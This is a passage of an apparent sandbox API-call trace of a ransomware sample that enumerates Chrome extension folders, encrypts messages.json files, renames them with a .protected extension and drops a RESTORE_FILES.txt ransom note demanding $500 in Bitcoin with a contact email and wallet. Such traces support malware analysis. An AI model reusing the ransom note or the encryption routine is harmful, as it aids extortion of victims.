| out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.912] CloseHandle (hObject=0x164) returned 1 [0083.912] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0083.912] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0083.912] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR") returned 153 [0083.912] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0083.912] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0083.912] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\*") returned 155 [0083.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.912] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.912] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.912] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.912] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.912] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.912] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\.") returned 155 [0083.912] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.912] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.912] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.912] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.912] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.912] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.912] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.913] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\..") returned 156 [0083.913] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.913] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.913] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.913] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.913] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.913] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.913] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.913] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.913] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json") returned 167 [0083.913] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.913] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.913] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.913] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json") returned 167 [0083.913] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json") returned 167 [0083.913] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.913] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json") returned 167 [0083.913] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.913] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.924] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.924] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.924] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.924] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.925] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.925] CloseHandle (hObject=0x168) returned 1 [0083.925] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.protected") returned 177 [0083.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0083.925] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.926] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.926] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\RESTORE_FILES.txt") returned 171 [0083.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.926] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.926] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.927] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.927] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.927] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.927] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.927] CloseHandle (hObject=0x164) returned 1 [0083.927] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0083.927] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0083.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT") returned 153 [0083.927] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0083.927] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0083.927] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\*") returned 155 [0083.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.927] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.927] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.927] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.927] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.928] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\.") returned 155 [0083.928] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.928] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.928] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.928] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.928] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.928] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.928] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\..") returned 156 [0083.928] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.928] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.928] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.928] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.928] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.928] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.928] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.928] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json") returned 167 [0083.928] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.928] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.928] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.928] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json") returned 167 [0083.929] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json") returned 167 [0083.929] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json") returned 167 [0083.929] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.929] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.930] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.930] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.931] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.931] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.931] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.931] CloseHandle (hObject=0x168) returned 1 [0083.931] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.protected") returned 177 [0083.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0083.932] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.932] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.932] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 171 [0083.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.932] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.932] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.933] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.933] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.933] lstrlenA 